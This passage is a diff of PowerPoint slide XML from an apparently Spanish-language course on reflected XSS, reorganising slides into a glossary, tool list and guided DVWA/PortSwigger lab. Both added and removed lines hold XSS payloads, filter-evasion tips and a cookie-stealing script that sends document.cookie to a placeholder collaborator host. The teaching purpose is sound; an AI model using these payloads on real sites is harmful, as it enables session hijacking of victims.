-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Prueba el payload básico: &lt;script&gt;alert(document.domain)&lt;/script&gt;.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Si se filtra &lt;script&gt;, prueba manejadores de evento: &lt;img src=x onerror=alert(1)&gt;.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Identifica el contexto: ¿estás dentro de un atributo? Cierra comillas: " onmouseover="alert(1).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Si aterrizas en un bloque &lt;script&gt;, rompe la cadena: ';alert(1)//.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Demuestra impacto en el lab robando la cookie: &lt;script&gt;new Image().src='//tu-collab/?c='+document.cookie&lt;/script&gt;.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Construye la URL de ataque completa que un atacante enviaría a la víctima y explica el flujo.</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  XSS — Inyección de JavaScript en el navegador de otra víctima</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  XSS reflejado — El payload viaja en la petición y se refleja en la respuesta</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Payload — Script inyectado que ejecuta el navegador</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Prueba de concepto — alert(1); demuestra la ejecución sin causar daño</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Contexto de inyección — Dónde cae la entrada: HTML, atributo, script, URL</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Escape de contexto — Cerrar comillas o etiquetas para salir del contexto</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4539,7 +4945,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4577,82 +4983,37 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Diseña un payload para contexto de atributo y otro para contexto de script.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Evade un filtro que elimina la palabra script (mayúsculas, anidado, eventos).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Explica por qué HttpOnly no evita el XSS, solo mitiga el robo de cookie.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Escribe una CSP que bloquearía tu payload y explica cómo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Diferencia reflejado, almacenado y DOM (adelanto de la próxima clase).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Codifica la salida correctamente en un template server-side para eliminar el bug.</a:t>
+              <a:t>•  DVWA (XSS reflected), Juice Shop, PortSwigger labs.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Burp para probar variaciones y observar reflexiones.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Navegador con DevTools.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4703,7 +5064,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4741,22 +5102,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Resuelve un lab de XSS reflejado de PortSwigger que requiera escapar de un contexto (atributo o script) y ejecutar alert(document.cookie).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: el lab queda marcado como resuelto, y explicas el contexto de inyección, el payload y qué codificación de salida lo habría prevenido.</a:t>
+              <a:t>•  En DVWA → XSS (Reflected), envía tu nombre y busca dónde se refleja en el HTML.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Prueba el payload básico: &lt;script&gt;alert(document.domain)&lt;/script&gt;.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Si se filtra &lt;script&gt;, prueba manejadores de evento: &lt;img src=x onerror=alert(1)&gt;.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Identifica el contexto: ¿estás dentro de un atributo? Cierra comillas: " onmouseover="alert(1).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Si aterrizas en un bloque &lt;script&gt;, rompe la cadena: ';alert(1)//.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Demuestra impacto en el lab robando la cookie: &lt;script&gt;new Image().src='//tu-collab/?c='+document.cookie&lt;/script&gt;.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Construye la URL de ataque completa que un atacante enviaría a la víctima y explica el flujo.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
